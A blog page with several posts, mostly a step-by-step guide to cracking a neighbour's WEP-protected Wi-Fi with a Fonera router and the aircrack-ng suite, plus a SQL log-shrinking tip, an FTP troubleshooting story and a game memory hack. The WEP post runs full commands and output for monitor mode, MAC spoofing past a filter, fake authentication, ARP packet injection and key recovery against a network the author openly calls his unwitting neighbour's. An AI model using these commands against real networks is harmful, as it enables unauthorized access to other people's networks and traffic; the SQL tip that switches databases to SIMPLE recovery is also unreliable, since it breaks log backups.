Hackviking.com He killed Chuck Norris, he ruled dancing so he took up a new hobby…

20Apr/100

SQL transaction logs growing and growing and …

Problems with growing transaction logs on SQL servers is a common problem. But many admins doesn't think twice about the problem, they just add more disk space. The transaction log is only needed when you want to do a restore to an other point then the last backup. So in many cases they are not needed right after a backup. Or you want to take a backup on them and then free up the space on you raid 10 disks that are more expensive then your backup media. To free up all the space used you need to set the database in simple recovery mode and then do a shrink on the DB. When that is done you place the DB back in the FULL RECOVERY MODE. So why not do this automatically ones a week right after the backup?

Just add an T-SQL section to your maintenance plan and run the code below:

EXEC sp_MSForEachDB
'ALTER DATABASE [?] SET RECOVERY SIMPLE;
DBCC SHRINKDATABASE (?, 10, TRUNCATEONLY);
ALTER DATABASE [?] SET RECOVERY FULL;'

Or if you want to build a custom list of databases, so you don't run this on all the DB's run this code to generate the T-SQL:

EXEC sp_MSForEachDB
'PRINT "ALTER DATABASE [?] SET RECOVERY SIMPLE";
PRINT "GO";
PRINT "DBCC SHRINKDATABASE (?, 10, TRUNCATEONLY);";
PRINT "GO";
PRINT "ALTER DATABASE [?] SET RECOVERY FULL;"
PRINT "GO";'

The important thing is to set TRUNCATEONLY, if you don't you will fragment the entire DB file. When you run the command above without the TRUNCATEONLY parameter it will take the last record in the DB file and place in the first hole of empty space in the DB file and so on. So you will create a fragmentation if you do so.
Another way to do it, which is slower and created more disk IO but can be done, is to do a transaction log backup and then just delete the transaction file backup.

MS documentation: http://msdn.microsoft.com/en-us/library/ms190488.aspx

16Apr/102

IIS 7 FTP access denied while uploading files

I got this strange problem yesterday at work. One of our developers was trying to upload files to e new server and he got 500 access denied each time he tried. After he spent hours double checking all the NTFS rights and IIS settings he asked me for help. At the first look I thought the IIS server had been messed up some how. After verifying everything that he told me was OK, after all he is a coder and they usually don't understand servers, I really didn't know what to do next. So I thought about it for a moment and then I started from scratch, checked the entire solution from the bigger picture.

So with the system blueprint in front of me it all started to clear up. The server was situated in our server center across town and all his traffic was passing through a VPN tunnel between our two ISA 2006 servers. The ISA server sets all the FTP rules to "Read-Only" by default but I didn't realise that this was a problem for the VPN site to site tunnel also. After checking the routing rule and then the access rule for the communication between the two networks I found the settings for FTP traffic between the two ISA servers. After I unchecked the "Read-Only" check box for the FTP traffic on the VPN site to site access rule it all worked as designed.

14Apr/100

World Domination II Hack

I was trying to pass the time the other night while waiting on a very slow crypto crack. On one of my servers I found the old flash game World Domination II. First I played it over and over again but then I wanted the edge. Like when the US goes to war with superior technology, money and control over the media. First i googled it to see if someone all ready done the work for me, just like you did when you found this. I actually found a hacked version online with limitless cash and less cash for the opponents. But I wanted more. So you can start out by testing the online hacked version and then follow the tutorial below.

World Domination 2 (full) - Hacked
Easy: $999999,000,000
Medium: $999999,000,000
Hard: $999999,000,000
Enemies money is lowered to $50.000.000
T.....
www.arcadeprehacks.com

http://www.arcadeprehacks.com/game/413/World-Domination-2-(full).html

First get Cheat Engine: http://www.cheatengine.org/downloads.php
Install it and start it!

In the top left corner there is a computer icon, click it.
You will see a list of processes that you can "hook" on to.
If your running the game online "hook" on to you browser process (iexplorer or firefox) or the WDII.exe if your running the downloaded version.

Now start the game and select your opponents and level and start.
I selected hard so I have $55.000.000 in cash. So I take 55 * 8 = 440.
Takes Cheat Engine and puts 440 in the value box and hits First Scan.

You will get a number of hits that we can sort through later. Now return to the game and either gain money through Resources or spend money some how.

I selected Resources and gained some cash. Now I'm up to $86.000.000. So I take 86 * 8 = 688.
Goes back to Cheat Engine and put that in the value box and hit Next Scan.
You will be left with two results, double click them both and changed them to something like 8000 and then freeze them. You have to change both of them otherwise you cant spend any money just look at a pretty number on the dashboard.

Before you do anything else go back to the game and hit the Propaganda button, select a city and check your Propaganda strength. Mine was 71%, so 71 * 8 = 568.
Take that and put it in the value field of Cheat Engine and hit New Scan and then First Scan.

Again a large number of hits, so do something to change your Propaganda Strength in the game.
My new strength was 87%. So 87 *8 = 696. Put that in the value field and hit Next Scan.
Double click the value, change it to 800 and freeze it and you will have 100% propaganda for ever.

You can change all the other values of the game, like number of warheads and stuff like that but that will really take all the fun out of the game. Now you can build what ever you want and start diplomatic relations with who ever you want.

5Apr/100

WEP Cracking with Fon (Fonera) router

I usually use my Fon router when doing the collection work for wlan cracking. I recently moved to a new apartment in my hometown and this is what I call a target rich environment! 15 wlans with good power right at my desktop. That is just to good to be true! So here is a little run down on how to do this easily. This guide can also be used for any other hardware but it has some special info just for the fonera.

Here are a guide to cracking your fonera router:
http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a linux computer for your pocket, much like your iPhone if you have one. The big differnece is that this linux pocket computer is great for wlan use. First start an SSH session to the router and login.

We need to setup the wlan card for our use. If your connected via the "Legend" wlan you have to keep that. I prefer to connect via cable to the router and then destroy the "Legend" network before I begin (wlanconfig ath0 destroy). But even if you destroy that you can run the rest of the guide with ath1.

So lets begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

wlanconfig ath1 create wlandev wifi0 wlanmode monitor

Then we want a list of networks around us that we can attack. With airodump-ng without any parameters we can get a list of wlans available for us.

airodump-ng ath1

The router respondse with a list of networks and information about encryption and you can also see a list of clients that the card picks up.
In the list below no clients are seen but the usually show up, this is just a quick scan I did to show the prinicple. When you have your list just it CTRL + C to get back to the prompt.

CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes

My unlucky neighbor that has chosen to call his/hers wlan for MAD will be todays target. I selected this becuase it's MAC controlled. If the correct MAC aren't in the routers "Allowed list" or "White list" I will be unable to connect. To be able to handle the amount of data that I need to collect to be able to crack the WEP key I need to connect a share to the FON router. In this case I will connect the FON to a share I put up on my Windows 7 box. First you need create an account on you windows box that doesn't have spaces in it and select a password for that account. Then share a folder and give read/write access to that account. Then mount it onto your FON router.

In the /mnt folder run the command:

mkdir share

Then mount the share to that folder like this:

mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME>; -o username=<USERNAME>,password=<PASSWORD> /mnt/share

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1

So what have we done now? We provided airodump-ng with some importent information:

-c3

We told it to listen to channel 3 only. If we omit this parameter it will hop up and down the channels.

--bssid 00:18:4D:8C:52:0E

We supplied the MAC address of the wlan base so it knows what to listen for.

-w /mnt/share/MAD

W stands for "Write" we want airodump-ng to dump the information into the file MAD on the Windows box share.

ath1

What wlan instance to use.

The router will also show us the information in real time while it collects the IV's (inital vectors) that we need for the crack.

CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5

Now you can see the client that is connected as well. When I started attacking this network I didn't know it had a MAC filter running but I found out pretty quick when I couldn't associate with it or authenticate with it. If you can't do an association like the one below or if packet injection fails (it's not sending any packets) you probable is talking to a MAC filtered router. So how do we solve this issue? We fake our MAC!

If you have no problem associating with the station like below you can skip this step.

aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful :-)

So what did I try here? I did a "Fake Authentication" against the router to so if it allows me to connect. Please note that the -h (my client MAC is the same as the client I found earlier).
In this screen shoot I have all ready faked my MAC to be able to connect to the router. I didn't save any screen shoot of the failure. I quick run down of the command above:

-1

Fake Authentication attack

0

How often to send a Authentication/Association Request (depending on the router you will be dropped after a while and need to re-authenticate)

-e "MAD"

The SSID of the router.

-a  00:18:4D:8C:52:0E

The MAC address of the router.

-h  00:22:43:6E:BD:F5

The MAC address of the client. In this case a spoofed one to get around the MAC filter but in all other cases you can use you original MAC or just 1:2:3:4:5:6

>ath1

The wlan instance to use.

So this raises two questions. First how do you get your MAC?

ifconfig

This command will show you all the info on all the network devices you have and you can extract the MAC address of the wifi0 in this case.
Second question how do I spoof my MAC?

ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up

Now we have changed the MAC address of the card to what we want/need. In some cases it can give you an error like "Device Not Ready".
Just try to destroy all the athX instances before you take the wifi0 off-line and you will probably succeed.

Now we can access the network to do our thing so let's get to it. If you had to destroy ath1 when you reset your MAC then just create it again as we did before.
Then start the airodump-ng with the file write option again:

airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1

Then start a second SSH client and connect to the FON and login again. Now we will help the process along big time! The data column in the scan result (first window/session) needs to go up to 250.000 for us to be able to crack a 128bit key and over 800.000 for heavier keys. You can collect all that data by just listening to the traffic but it will take days or even weeks. We can do it much quicker our selfs. In the second window/session we will start a packet injection attack of the ARP kind. In short ARP is a way for network gear to keep track of witch device have witch IP address and MAC address combination. Every time we send an ARP request the router will respond with a new IV (initial vector) and that's what we count as data so and then use to crack the key. So let's get the IV's coming!

aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1

This will start sending packets in large numbers. The FON can send about 40-50 packets per second. Thanks to the fact that we changed our MAC we will now get our traffic through. If you see the "packets sent" counter stopping that usually just that you lost you association with the router. Just hit CTRL + C and run the "Fake Authentication" attack again. If this happens over and over again set the -1 0 to something like -1 20 and it will re-associate every 20 seconds. If you need to do that just open a third window/session so you can have it all running at once.

Once we collected enough IV's we can start cracking. I usually start the cracking process on the file before the collection is done. If you do so it will start the process and if no key is found restart the crack every 5.000 IV's collected. How ever this is not a job for the FON due to it's limited processing power. I usually use my linux box or my windows box where I have more computing power. The windows box is easy, there is a GUI, so if you made it this far you will be able to figure that out. The command line to do this is:

aircrack-ng c:\temp\fonera\mad_mac-01.cap

The result will be something like this:

Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%

As you can see I only needed little over 170.000 IV's to do this and when the crack was successful I could stop the attack on the network.
So now we have the key:

04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A

People who get this far still ask me a question, "How do I use that key from windows?"
The routers accepts both ASCII phrases and hex keys like the one above. Just remove the : from the key and windows will be able to connect to the network.